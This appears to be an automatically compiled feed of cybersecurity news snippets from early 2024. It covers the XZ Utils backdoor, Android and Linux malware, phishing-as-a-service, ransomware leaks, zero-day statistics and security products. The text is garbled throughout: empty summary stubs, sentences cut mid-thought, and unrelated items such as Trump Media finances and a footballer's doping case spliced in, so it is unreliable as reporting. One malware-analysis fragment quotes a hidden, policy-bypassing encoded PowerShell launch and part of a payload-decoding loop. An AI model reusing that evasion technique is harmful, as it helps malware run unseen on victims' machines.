Aliquippa in Pennsylvania. Ballistic Bobcat/Charming Kitten attacks ESET researchers uncovered a sophisticated cyber-espionage campaign carried out by suspected Iranian-aligned threat actor Ballistic Bobcat (aka APT35, APT42, Charming Kitten, TA453, and PHOSPHORUS). "Autosummary:
"It modifies ifunc calls to replace a check "is_arch_extension_supported" which should simply invoke "cpuid" to insert a call to "_get_cpuid" which is exported by the payload object file (i.e., liblzma_la-crc64-fast.o) and which calls malformed _get_cpuid() which is implanted into the code shown in the figure below. "Autosummary:
"The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said. "Autosummary:
" The cybersecurity firm has described Earth Freybug as a subset within APT41, a China-linked cyber espionage group that"s also tracked as Axiom, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti. "Autosummary:
Previously, they have targeted a broad spectrum of organizations, including governments, hardware vendors, software developers, think tanks, telecommunication service providers, and educational institutes. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Personal information like names, addresses, phone numbers, passcodes, and social security numbers are prized assets for cybercriminals because they can be used to make scams much more believable. In 2021, a hacker named “Shiny Hunters” put a database apparently containing the personal details of 70 million AT&T customers up for sale, but AT&T denied the leak was its data, and denied it again when the data appeared on the dark web last month. "Autosummary:
It went public in March 2024 via what is known as a SPAC - basically, it was acquired by a company whose shares were already trading publicly on the stock market, in this case, Digital World Acquisition Corp. Mr Trump now owns about 57% of shares in the combined firm, which was renamed Trump Media and trades under the DJT ticker - Mr Trump"s initials. Image source, Getty Images The next biggest owner of TMTG is the Kuwaiti-headquartered investment firm ARC Global Investments, which has a 6.9% stake, according to Trump Media filings with financial regulators. Trump Media lost nearly $60m in 2023, while bringing in only about $4m in revenue from advertising, according to its latest financial update, which also warned of "substantial doubt" about its ability to continue as a business. "Evasive, basic, and encrypted malware all increased in Q4 2023, fueling a rise in total malware, according to WatchGuard. Threat actors employ diverse tactics The average malware detections rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific. “The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities … More
The post Escalating malware tactics drive global cybercrime epidemic appeared first on Help Net Security.
"Autosummary:
A malware-as-a-service (MaaS), Glupteba’s malicious capabilities include downloading additional malware, masquerading as a botnet, stealing sensitive information, and mining cryptocurrency with tremendous stealth. "Armed forces have always utilized war-gaming exercises for battlefield training to prepare for times of conflict. With today’s digital transformation, the same concept is being applied in the form of cybersecurity exercises – tests and simulations based on plausible cyber-attack scenarios and incident response. Cyber exercises press an organization’s ability to detect, investigate, and respond to threats in a timely and secure manner. Well-designed cybersecurity exercises help organizations proactively identify and address vulnerabilities in their … More
The post How to design and deliver an effective cybersecurity exercise appeared first on Help Net Security.
"Autosummary:
For example, a phishing exercise, which can be conducted at any time, has a low resourcing requirement; while red and blue team exercises require one to eight weeks to run, dedicated teams, and access to a live or a test environment. 6. Design a cybersecurity exercise During a cybersecurity exercise, many forms of cyber-attacks, ranging from simple to highly sophisticated, can be simulated.Phishing exercises test employees’ ability to detect fraudulent communications (email, text, phone, web), social engineering attempts, and their ability to respond to successful attacks.They include pieces of information for participants (e.g., indicators of compromise, a customer complaint, a help desk report, a piece of threat intelligence or a SOC alert), as well as key stages of the exercise. "Autosummary:
One of the prominent additions to Vultur is the ability to remotely interact with the infected device, including carrying out clicks, scrolls, and swipes, through Android"s accessibility services, as well as download, upload, delete, install, and find files. "Autosummary:
"When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor"s infrastructure," security researchers said. "Autosummary:
"We had targets and if we didn"t meet those, they would not give us food or allow us into our rooms," the individual, identified only as Stephen, was quoted as saying. "Autosummary:
Complete inventory of software, patches and browser extensions Status & change detection of all scheduled tasks, services/drivers & processes Detect unusual behavior such as processes & logins Sysmon integration Detailed monitoring of every single Active Directory object Network, NetFlow & Performance Monitoring Log Power Logs contain a wealth of data that are the foundation for any monitoring effort - especially on the Windows platform, which provides a well-structured logging framework (that can be supercharged with the free Sysmon utility!): EventSentry includes a number of features that can detect malware propagation: Software inventory helps verify that critical software is up to date Anomaly detection can flag unusual access, e.g. logins from previously unknown IP addresses Service Monitoring can detect malicious services & drivers Syslog & SNMP monitoring can detect failed login attempts to network devices Validation Scripts & Patch inventory minimizes vulnerabilities Sysmon integration can detect advanced pass-the-hash/ticket attacks 5. By monitoring scheduled tasks, services, drivers, software, browser extensions, and registry keys, EventSentry makes it more difficult for malware to hide persistence.It does this for a variety of purposes: Better persistence (the more hosts that are infected, the more difficult it is to remove) Additional asset discovery (think data exfiltration, Ransomware) Utilizing more helpers for a botnet, mining, etc. But what if you could detect many malware attacks holistically with a set of tools that are part of a single solution: Highly customizable log monitoring & consolidation with a sophisticated real-time monitoring engine Comprehensive validation checks of important security & audit settings in Windows - organized by compliance - provide a solid foundation for defense.For example, most SIEMs are unaware of installed software, scheduled tasks, services & drivers - yet that is exactly where a lot of malware slips through. Conclusion Protecting complex network infrastructures - especially Windows - from advanced threats requires a sophisticated defense that goes beyond collecting logs, Antivirus and casual adherence to compliance frameworks. "Autosummary:
Some of the new features implemented in this variant include the ability to: Download, upload, delete, install, and find files; Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more); Prevent apps from running; Display a custom notification in the status bar; Disable Keyguard in order to bypass lock screen security measures. "Autosummary:
"The resumes contained names, email addresses, phone numbers, physical addresses, and other personally identifiable information," said OWASP Executive Director Andrew van der Stock. "Autosummary:
The Rhysida ransomware-as-a-service (RaaS) operation emerged almost one year ago, in May 2023, and gained notoriety after breaching the British Library and the Chilean Army (Ejército de Chile). "Autosummary:
Fake Giveaways, Discounts, or Money to Claim : Scams offer bogus discounts or giveaways from known brands, leading victims to buy gift cards or send money to claim the non-existent offers. "Autosummary:
"Autosummary:
"Autosummary:
However, if the information is current, such as containing your mobile phone number, please take the usual precautions when answering unsolicited emails, mail, or phone calls.” concludes the notification. "Autosummary:
Regardless, upon review we can confirm the stolen data is legitimate. — vx-underground (@vxunderground) March 17, 2024 The researchers confirmed that the leaked data is legitimate, however, it is still unclear if the information was stolen from a third-party organization linked to AT&T. The seller, who goes online with the moniker MajorNelson, claims that the data was obtained from an unnamed AT&T division by @ShinyHunters in 2021. "Autosummary:
"Autosummary:
The malware"s execution logic (Kaspersky) The infected machine is tagged using infection, hardware, and system details and the report is sent to the command and control (C2) server to manage victim hosts. "Autosummary:
"The news that XZ Utils, a compression utility present in most Linux distributions, has been backdoored by a supposedly trusted maintainer has rattled the open-source software community on Friday, mere hours until the beginning of a long weekend for many. Nearly two days have passed since then. What do we currently know about the entire affair? The discovery The backdoor was discovered by Andres Freund, a software engineer at Microsoft, when testing some things on … More
The post XZ Utils backdoor update: Which Linux distros are affected and what can you do? appeared first on Help Net Security.
"Autosummary:
XZ Utils was authored by and is still led by Lasse Collin, but the backdoor was introduced by someone that went by “Jia Tan” (JiaT75 on GitHub), who became – over several years, with the help of sock puppet accounts and trust-building via social engineering – a prolific maintainer of the software, and did other things to keep the existence of the backdoor under wraps. Debian maintainers announced that “no Debian stable versions are known to be affected”, but that compromised packages were part of the Debian testing, unstable and experimental distributions, and users of those “are urged to update the xz-utils packages.” "Autosummary:
DinodasRAT Linux variant targets users worldwide Pierluigi Paganini March 31, 2024 March 31, 2024 A Linux variant of the DinodasRAT backdoor used in attacks against users in China, Taiwan, Turkey, and Uzbekistan, researchers from Kaspersky warn. Researchers from Kaspersky uncovered a Linux version of a multi-platform backdoor DinodasRAT that was employed in attacks targeting China, Taiwan, Turkey, and Uzbekistan.Instead, hardware-specific information is collected and used to generate a UID, demonstrating that DinodasRAT’s primary use case is to gain and maintain access via Linux servers rather than reconnaissance.” concludes the report.The UID typically includes the date of infection, MD5 hash of the dmidecode command output (a detailed report of the infected system’s hardware), randomly generated number as ID, and backdoor version. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Interestingly, the malicious website cannot be accessed directly, as it returns an error," security researchers Jaron Bradley, Ferdous Saljooki, and Maggie Zirnhelt said. "Autosummary:
"Autosummary:
Vultur"s infection chain (Fox-IT) New capabilities The latest version of Vultur malware that researchers analyzed keeps several key features from older iterations, such as screen recording, keylogging, and remote access via AlphaVNC and ngrok, allowing attackers real-time monitoring and control. "Autosummary:
Compromised packages were part of the Debian testing, unstable and experimental distributions, with versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1.” reads th advisory. "Though generative AI offers financial firms remarkable business and cybersecurity utility, cyberthreats relating to GenAI in financial services are a consistent concern, according to FS-ISAC. Cybercriminals exploit AI for data exfiltration The cybersecurity community’s current consensus is that adversarial usage primarily relates to the creation of convincing phishing lures at scale. That said, threat actors can use generative AI to write malware and more skilled cybercriminals could exfiltrate information from or inject contaminated data into … More
The post AI abuse and misinformation campaigns threaten financial institutions appeared first on Help Net Security.
"Autosummary:
Zero-day vulnerabilities in the supply chain continue to leave the sector unprotected, as attacks on providers disrupt various systems across the sector, such as those of clearing, trading, payments, and back-office service operations. "Companies demonstrating advanced cybersecurity performance generate a shareholder return that is 372% higher than their peers with basic cybersecurity performance, according to a new report from Diligent and Bitsight. Boards under pressure to fortify cyber oversight The escalation in the frequency and severity of cyber incidents has positioned cyber risk as one of the foremost challenges confronting boards. With cyber threats becoming increasingly sophisticated and pervasive, boards are under pressure to effectively address cybersecurity risks … More
The post Advanced cybersecurity strategies boost shareholder returns appeared first on Help Net Security.
"Autosummary:
Specialized risk or audit committees enhance cybersecurity performance The median cybersecurity rating for companies with specialized risk committees is 730, compared to 720 for companies with just audit committees, indicating there is not a significant difference in the ability of the audit committee to oversee cyber risk compared to a specialized risk committee. "Autosummary:
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Autosummary:
That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S. Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices and, deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless. "Autosummary:
" Red Hat reverts to XZ 5.4.x in Fedora Beta Red Hat is now tracking this supply chain security issue as CVE-2024-3094, assigned it a 10/10 critical severity score, and reverted to 5.4.x versions of XZ in Fedora 40 beta. "A vulnerability (CVE-2024-3094) in XZ Utils, the XZ format compression utilities included in most Linux distributions, may “enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely,” Red Hat warns. The cause of the vulnerability is actually malicious code present in versions 5.6.0 (released in late February) and 5.6.1 (released on March 9) of the xz libraries, which was accidentally found by Andres Freund, a PostgreSQL developer and … More
The post Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094) appeared first on Help Net Security.
"Autosummary:
Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the “fixes” [for errors caused by the injected code in v5.6.0],” Freund commented “Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by Linux distributions, and where they have, mostly in pre-release versions.” "Autosummary:
"Autosummary:
"If players believe they may have clicked on a suspicious link or if they want to ensure their account is protected, they can change their password and follow recommended best practices," the company added, referring to two-factor authentication (2FA). "Autosummary:
Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024 Pierluigi Paganini March 28, 2024 March 28, 2024 Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during the Pwn2Own Vancouver 2024. "The rise in identity-based attacks can be attributed to a rapid increase in malware, according to SpyCloud. Researchers found that 61% of data breaches in 2023, involving over 343 million stolen credentials, were infostealer malware-related. Of these compromised identity records, one in four contained information about the user’s network or physical location, putting the individual’s identity, platforms they have access to, and physical well-being at risk. Infostealer malware exposes user information Taking a deeper look … More
The post Cybercriminals use cheap and simple infostealers to exfiltrate data appeared first on Help Net Security.
"Autosummary:
Mobile malware on the rise Researchers also recaptured nearly 200 different types of personally identifiable information (PII) in 2023, ranging from full names (3.16 billion) and phone numbers (2.14 billion) to dates of birth (920.25 million), social security and national ID numbers (171.61 million) and credit card numbers (36.97 million). Infostealer malware exposes user information Taking a deeper look into how stolen data empowers bad actors to perpetrate cybercrimes including account takeover, fraud, and ransomware, researchers analyzed the exposures of the average digital identity being traded in the criminal underground and found that the average identity appears in as many as nine breaches and is associated with 15 breach records. "The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-24955 – a code injection vulnerability that allows authenticated attackers to execute code remotely on a vulnerable Microsoft SharePoint Server – to its KEV catalog and is demanding that US federal civilian agencies implement the patch for it by April 16. As per usual, details about the attack in which the flaw is leveraged have not been shared. About CVE-2023-24955 and CVE-2023-29357 CVE-2023-24955 and CVE-2023-29357, a … More
The post Patch actively exploited Microsoft SharePoint bug, CISA orders federal agencies (CVE-2023-24955) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Chromium vulnerabilities are considered critical if they “allow an attacker to read or write arbitrary resources (including but not limited to the file system, registry, network, etc.) on the underlying platform, with the user’s full privileges.” "2023 saw attackers increasingly focusing on the discovery and exploitation of zero-day vulnerabilities in third-party libraries (libvpx, ImagelO) and drivers (Mali GPU, Qualcomm Adreno GPU), as they can affect multiple products and effectively offer more possibilities for attack. Another interesting conclusion from Google’s recent rundown of the 97 zero-days exploited in-the-wild in 2023 is that there’s a notable increase in targeting enterprise-specific technologies. Number of zero-days exploited in the wild (2019-2023). Source: Google “This observed … More
The post Zero-day exploitation surged in 2023, Google finds appeared first on Help Net Security.
"Autosummary:
Source: Google “This observed increase in enterprise targeting was fueled mainly by exploitation of security software and appliances, including, but not limited to, Barracuda Email Security Gateway, Cisco Adaptive Security Appliance, Ivanti Endpoint Manager Mobile and Sentry, and Trend Micro Apex One,” Google TAG’s and Mandiant’s threat analysts noted. "NHS Dumfries and Galloway (part of NHS Scotland) has confirmed that a “recognised ransomware group” was able to “access a significant amount of data including patient and staff-identifiable information,” and has published “clinical data relating to a small number of patients.” “NHS DG still holds the original files and they have not been altered or deleted. Some information has been copied and leaked. NHS DG will contact everyone whose information is known to have been … More
The post NHS Scotland confirms ransomware attackers leaked patients’ data appeared first on Help Net Security.
"Autosummary:
On Tuesday, the group released a “proof pack” consisting of a handful of sensitive documents (reports, analysis results, and letters between patients and physicians), to incentivize the board to pay the ransom in exchange for keeping the stolen data under wraps. "Autosummary:
In 2023, the researchers observed 36 zero-day vulnerabilities exploited in the wild targeting enterprise-specific technologies, while 61 vulnerabilities affected end-user platforms and products such as mobile devices, operating systems, browsers, and other applications. "Autosummary:
"Autosummary:
Info-stealer payload (Checkmarx) Checkmarx makes available in its report the full list of malicious entries they found, which contains numerous typosquatting variants for many legitimate packages. "Autosummary:
“Whenever someone asks a question about Snapchat, the answer is usually that because their traffic is encrypted we have no analytics about them. . . . "Autosummary:
The Guardian, which initially brought attention to the claims, said that it was still not known if the malware infection had been eradicated, and that the Sellafield site had been put in "special measures" due to its consistent cybersecurity breaches and failure to report incidents. "Autosummary:
"Autosummary:
"While end-to-end encryption in RCS and iMessage delivers valuable privacy for end users, it also allows criminals to evade filtering required by this legislation by making the content of messages impossible for network operators to examine, leaving Google and Apple"s on-device spam detection and third-party spam filter apps as the primary line of defense preventing these messages from reaching victims," Netcraft added. A majority of the templates are designed to mimic postal services, but they also include public and private utilities, financial institutions, government bodies (e.g., tax departments), airlines, and telecommunication organizations. "Autosummary:
"Autosummary:
"Since we can send escape sequences through wall, if a user is using a terminal that supports this escape sequence, an attacker can change the victims clipboard to arbitrary text," Ferrante details. "Autosummary:
The command line shows signs of the malicious script execution, with parameters indicative of a desire to hide the window (-WindowStyle Hidden), bypass execution policies (-Ep ByPass), and run encoded commands (-ComMand “sa43…).if ($payloadIndex -ge $decodeKey.Length) { $payloadIndex = $decodeKey.Length } } [System. "Autosummary:
"Autosummary:
This incident compromised servers storing sensitive data, including names, surnames, postal addresses, email addresses, telephone numbers, and even bank account details of subscribers and shareholders. The breach impacted a variety of victims, including parents of junior players, international players, professionals from 2016-2018, contacts of the KNVB Sports Medical Center, and individuals involved in the organization’s disciplinary matters from 1999-2020. The team acknowledged the attack, lamenting the exfiltration of 32 GB of sensitive data, including player information such as passports and identity documents, contracts, confidentiality agreements, and other legal documentation. This attack had severe implications for one of the NBA’s most prominent teams, with the attackers claiming responsibility for leaking over 500 GB of confidential information, including sensitive data such as player contracts, customer records, and financial details. The attack, variously attributed to Sandworm and Fancy Bear APT groups, primarily targeted the event’s official website, the servers of ski resorts hosting the Olympic contests, and two IT service providers who managed the event’s technical infrastructure. "Cyber Product Owner UBS | Israel | On-site – View job details Your primary responsibilities will include owning and managing application security testing products, collaborating with the cyber hygiene operational team, and understanding their needs. You will also engage with the application development community to comprehend their requirements for application security testing. Cybersecurity Engineer AKUR8 | France | Hybrid – View job details AKUR8 seeks a cybersecurity engineer to help improve security posture and manage … More
The post Cybersecurity jobs available right now: March 27, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Security and Compliance Lead Carrier | Portugal | On-site – View job details The position serves as the process owner of all assurance activities related to the availability, integrity, and confidentiality of customers, business partners, employees, and business information in compliance with the organization’s information security policies. Cyber Security Assurance Analyst Stryker | Costa Rica | Hybrid – View job details You will be responsible for assessing, analyzing, and evaluating security controls, policies, and procedures to identify vulnerabilities and risks, as well as providing recommendations for remediation and continuous improvement. "The volume of mergers and acquisitions has surged significantly this quarter. Data from Dealogic shows a 130% increase in US M&A activity, totaling $288 billion. Worldwide M&A has also seen a substantial uptick, rising by 56% to $453 billion. Considering the rise in M&A transactions, cybersecurity considerations have become more pressing than ever. Integrating disparate IT systems and data repositories during mergers and acquisitions opens organizations up to potential vulnerabilities that pose significant risks to … More
The post Cybersecurity essentials during M&A surge appeared first on Help Net Security.
"Autosummary:
"Autosummary:
According to Trezor, someone posing as "a credible entity from the crypto space", using a Twitter account with thousands of followers, approached its PR team on February 29, 2024. In a subsequent blog post, Trezor explained how its Twitter account had been compromised - despite the firm having sensible security precautions in place, such as strong passwords and multi-factor authentication. "Malwarebytes has added AI functionality to its Security Advisor, available in every ThreatDown Bundle. Leveraging generative AI technology, the new capabilities will transform Security Advisor into a dynamic experience that allows customers to use simple natural language requests to search for information about their environment, ask for recommendations on how to optimize their security posture, automatically implement updates, and more. This will allow customers to quickly mitigate threats, reduce risk, and boost efficiency. “As we … More
The post Malwarebytes adds AI functionality to ThreatDown Security Advisor appeared first on Help Net Security.
"Autosummary:
Leveraging generative AI technology, the new capabilities will transform Security Advisor into a dynamic experience that allows customers to use simple natural language requests to search for information about their environment, ask for recommendations on how to optimize their security posture, automatically implement updates, and more. "Scammers are leveraging the Darcula phishing-as-a-service platform, iMessages and Google Messages to great effect. The platform allows them to impersonate a variety of brands based in over 100 different countries: postal services, public and private utilities, packet delivery services, financial institutions, government bodies, airlines, and telcos. What’s unusual about this platform? “Darcula is cat-themed, with a cat as its Telegram channel image, the administration panel previously being labeled with a cat image, and infrastructure domains … More
The post Attackers leverage weaponized iMessages, new phishing-as-a-service platform appeared first on Help Net Security.
"Autosummary:
Other interesting aspects of the platfom are: Its use of JavaScript, React, Docker, and Harbor Its capability to update phishing sites with new features and anti-detection measures without having to remove and re-install the phishing kit “The Darcula platform has been used for numerous high-profile phishing attacks over the last year, including messages received on both Apple and Android devices in the UK, as well as package scams impersonating United States Postal Service (USPS) highlighted in numerous posts on [Reddit’s subreddit about phishing],” the researchers noted. "Autosummary:
This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure. "Autosummary:
" Tycoon, publicly documented by Trustwave last month, permits cyber criminals to target users of Microsoft 365 with phony login pages to capture their credentials, session cookies, and two-factor authentication (2FA) codes. "Autosummary:
"Autosummary:
Ransomware Groups and Affiliates: A Complex Supply Chain As the cybercrime ecosystem has grown, it’s also grown more complex with many different actors carrying out individual legs of a complex supply chain. This has led to a highly competitive ecosystem, in which the largest ransomware groups try to offer potential affiliates a larger share of successful ransoms and less restrictions than other groups as a play to win the most sophisticated affiliates. LockBit’s Affiliate Rules page Giving affiliates the hard work of executing successful attacks allows the groups to scale much faster and compromise many more victims than would otherwise be possible while also enabling the groups to continue to innovate on their ransomware code. "Autosummary:
Zero-days exploited in attacks since 2019 (Google) Spyware behind 50% of all zero-days exploited in 2023 However, in 2023, commercial surveillance vendors (CSVs) were behind most zero-day exploits targeting Google products and Android ecosystem devices. "Attackers are leveraging a vulnerability (CVE-2023-48022) in Anyscale’s Ray AI software to compromise enterprise servers and saddle them with cryptominers and reverse shells. “To our knowledge, the attack started 7 months ago,” Avi Lumelsky, a researcher at Oligo Security, told Help Net Security. “We observed hundreds of compromised clusters in the past three weeks alone. Each cluster uses a public IP address, and most clusters contain hundreds to thousands of servers. There are hundreds of … More
The post AI framework vulnerability is being used to compromise enterprise servers (CVE-2023-48022) appeared first on Help Net Security.
"Autosummary:
The compromised machines included a wealth of sensitive information, including: OpenAI tokens (which can be used to access OpenAI accounts) Stripe tokens (which can be used to drain Stripe payment accounts) HuggingFace tokens (which may allow attackers to access private repositories and fiddle with ML models) Slack tokens (attackers may use to read an affected organization’s Slack messages or send messages) Production DB credentials (allowing attackers to download/modify databases), and more. "Autosummary:
"Autosummary:
One such API in the Chromium-based Edge browser is edgeMarketingPagePrivate, which is accessible from a set of allowlisted websites that belong to Microsoft, including bing[.]com, microsoft[.]com, microsoftedgewelcome.microsoft[.]com, and microsoftedgetips.microsoft[.]com, among others. "Autosummary:
"Autosummary:
"Autosummary:
Error. "Autosummary:
The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image. "Autosummary:
"Autosummary:
Darcula has been used against various services and organizations, from postal, financial, government, taxation departments, to telcos, airlines, utility, offering fraudsters over 200 templates to choose from. "AI’s algorithms and machine learning can cull through immense volumes of data efficiently and in a relatively short amount of time. This is instrumental to helping network defenders sift through a never-ending supply of alerts and identify those that pose a possible threat (instead of false positives). Reinforcement learning underpins the benefit of AI to the cybersecurity ecosystem and is closest to how humans learn through experience and trial and error. Unlike supervised learning, reinforcement … More
The post Reinforcement learning is the path forward for AI integration into cybersecurity appeared first on Help Net Security.
"Autosummary:
Reinforcement learning use cases One use case of reinforcement learning is network monitoring, where an agent can detect network intrusions by observing traffic patterns and applying lessons learned to raise an alert. How reinforcement learning can help Alert fatigue for security operations center (SOC) analysts has become a legitimate business concern for chief information security officers, who are concerned about analyst burnout and employee turnover as a result. "In this Help Net Security interview, Aaron Crow, Senior Director at MorganFranklin Consulting, discusses critical infrastructure cybersecurity strategies, barriers to threat information sharing, and innovative technologies enhancing resilience against cyberattacks. How do current cybersecurity strategies address the critical infrastructure sectors’ unique needs and vulnerabilities? Some current cybersecurity strategies such as protocol isolation, network segmentation and visibility certainly help to address some of the ‘low-hanging fruit’ and visibility allows the sectors to have a good idea … More
The post Strengthening critical infrastructure cybersecurity is a balancing act appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Aaron Crow, Senior Director at MorganFranklin Consulting, discusses critical infrastructure cybersecurity strategies, barriers to threat information sharing, and innovative technologies enhancing resilience against cyberattacks.These controls, such as regular patch management, access controls, and network segmentation, address common vulnerabilities and reduce the attack surface, making it harder for adversaries to exploit weaknesses within the technology ecosystem and have historically proven ROI. Additionally, these solutions integrate multi-factor authentication, user-to-asset access controls, user session analytics, and automatic video recording. "25% of Americans has lost money to online tax scams, according to McAfee. Of the people who clicked on fraudulent links from supposed tax services, 68% lost money. Among those, 29% lost more than $2,500, and 17% lost more than $10,000. Moreover, 76% lost money after clicking links in cryptocurrency tax-related messages, with 26% losing more than $2,500 and 16% losing more than $10,000. Cybercriminals embrace AI tools for attacks McAfee’s research points to the … More
The post Scammers exploit tax season anxiety with AI tools appeared first on Help Net Security.
"Autosummary:
We urge people to balance convenience with caution, practice good cyber hygiene, and use the latest in AI-powered online protection to keep their privacy, identity, and personal information safe to help ensure a scam-free tax season,” continued Grobman. "The rapid digital transformation and technological progress within the technology sector have enlarged the attack surface for companies operating in this space, according to Trustwave. As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow. This growth often occurs at a rate that outstrips the deployment of adequate security measures, such as the inability to keep track of and remediate vulnerabilities, which exposes the company … More
The post Tech industry’s focus on innovation leaves security behind appeared first on Help Net Security.
"Autosummary:
As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow.Even a minor security breach can cripple a company and cause cascading disruptions across the vital systems we rely on, including internal business operations, customer-trusted software and products, and the infrastructure supporting supply chains. "Autosummary:
The vulnerabilities added are as follows - CVE-2023-48788 (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection Vulnerability (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection Vulnerability CVE-2021-44529 (CVSS score: 9.8) - "Autosummary:
"Autosummary:
"I have never attempted to obstruct or defraud any test, and I trust that I will be cleared by the higher court," he said in a post on X. "Since the beginning of my career as a footballer, I have always followed the rules of the game and never used banned substances. "GitGuardian has released its Software Composition Analysis (SCA) module. SCA directly impacts the health of organizations’ codebase by automating vulnerability detection, prioritization, and remediation in software dependencies. Its additional capabilities ensure code licensing and regulatory compliance, such as generating comprehensive SBOM (Software Bill of Materials). Open-source software has transformed software development, providing developers access to a vast pool of reusable components. However, open-source dependencies can be a significant security liability for organizations, as developers often … More
The post GitGuardian SCA automates vulnerability detection and prioritization for enhanced code health appeared first on Help Net Security.
"Autosummary:
GitGuardian’s product suite addresses this gap by integrating a range of security tools, including Secrets Detection, Public Monitoring, Software Composition Analysis, Infra as Code Security, and Honeytoken.The latest addition to GitGuardian’s code security platform equips security and developer teams with a unified vulnerability remediation solution, capitalizing on cross-team collaboration, incident visibility, and context. "DataVisor announced its latest offering: an end-to-end anti-money laundering (AML) solution boasting technology and comprehensive functionalities powered by machine learning and AI. Amidst increasing regulatory compliance requirements and the growing complexity of financial crime tactics, this essential solution stands out for its ability to cover the entire AML workflow, while fitting seamlessly into customers’ current workflows. The solution integrates with DataVisor’s AI-powered fraud platform natively, offering a unified fraud and anti-money laundering (FRAML) approach. This … More
The post DataVisor’s AML solution helps combat sophisticated financial crimes appeared first on Help Net Security.
"Autosummary:
DataVisor’s AML solution features the following benefits: Comprehensive end-to-end solution : End-to-end functionality includes customer risk rating, CDD/EDD, sanction/watchlist screening, transaction monitoring, case management, and automated SAR filing, ensuring streamlined AML processes and full regulatory compliance. "Autosummary:
The framework boasts over 30,500 stars on GitHub, and it is used by many organizations worldwide, including Amazon, Spotify, LinkedIn, Instacart, Netflix, Uber, and OpenAI, that use it for training ChatGPT. "Autosummary:
Once the malware gains access to a device, it checks for the presence of specific shell environments ("/bin/bash," "/bin/ash," or "/bin/sh"); otherwise, it stops the execution. "Autosummary:
" Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address after every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address. "Autosummary:
How to stay safe from loan fraud Look out for the following red flags to stay safe: Guaranteed approval of a loan Request for upfront payment of a fee Unsolicited contact by the loan company Pressure tactics and a sense of urgency, which are a supremely popular trick among scammers of various kinds A sender email address or website domain that doesn’t match the company name No fine print to check on the loan itself Also consider the following precautionary steps: Research the company purporting to offer the loan Never pay an upfront fee unless the company sends an official notice setting out the terms of the loan and reasons for the extra charge (which you have to agree to in writing) Always use anti-malware on your computer and multi-factor authentication (MFA) to reduce the chances of data theft Don’t reply direct to unsolicited emails Don’t overshare online – scammers may be scanning social media for any opportunities to prey on your financial situation Only download apps from official Google/Apple app stores Ensure your mobile device is protected with security software from a reputable vendor Don’t download apps that ask for excessive permissions Read user reviews before downloading any app Report suspected scams to the appropriate authorities, such as the Federal Trade Commission (FTC) or Consumer Financial Protection Bureau (CFPB) As long as there are people in need of financing, loan fraud will be a threat. 1. Loan fee (advance fee) fraud Probably the most common type of loan fraud, this usually involves a scammer posing as a legitimate lender.These schemes also involve enticing loan terms or even debt forgiveness, bogus assistance with loan repayment, fraudulent promises to cut monthly payments, consolidate multiple student loans into a more manageable “package”, or negotiate with lenders on behalf of borrowers – in exchange for upfront fees for these “services”. "Open-source software’s adaptive nature ensures its durability, relevance, and compatibility with new technologies. When I started digging deeper into the open-source cybersecurity ecosystem, I discovered an engaged community of developers working to find practical solutions to many problems, one of them being saving time. Here are 20 essential open-source cybersecurity tools that are freely available and waiting for you to include them in your arsenal. Adalanche Adalanche provides immediate insights into the permissions of users … More
The post 20 essential open-source cybersecurity tools that save you time appeared first on Help Net Security.
"Autosummary:
Prowler Prowler is an open-source security tool designed to assess, audit, and enhance the security of AWS, GCP, and Azure. Lynis Lynis is a comprehensive open-source security auditing tool for UNIX-based systems, including Linux, macOS, and BSD. Mobile Security Framework (MobSF) MobSF is an open-source research platform for mobile application security, encompassing Android, iOS, and Windows Mobile. "Among Gartner’s top predictions are the collapse of the cybersecurity skills gap and the reduction of employee-driven cybersecurity incidents through the adoption of generative AI (GenAI). Two-thirds of global 100 organizations are expected to extend directors’ and officers’ insurance to cybersecurity leaders due to personal legal exposure. Furthermore, battling malinformation is projected to cost enterprises more than $500 billion. “As we start moving beyond what’s possible with GenAI, solid opportunities are emerging to help solve … More
The post 8 cybersecurity predictions shaping the future of cyber defense appeared first on Help Net Security.
"Autosummary:
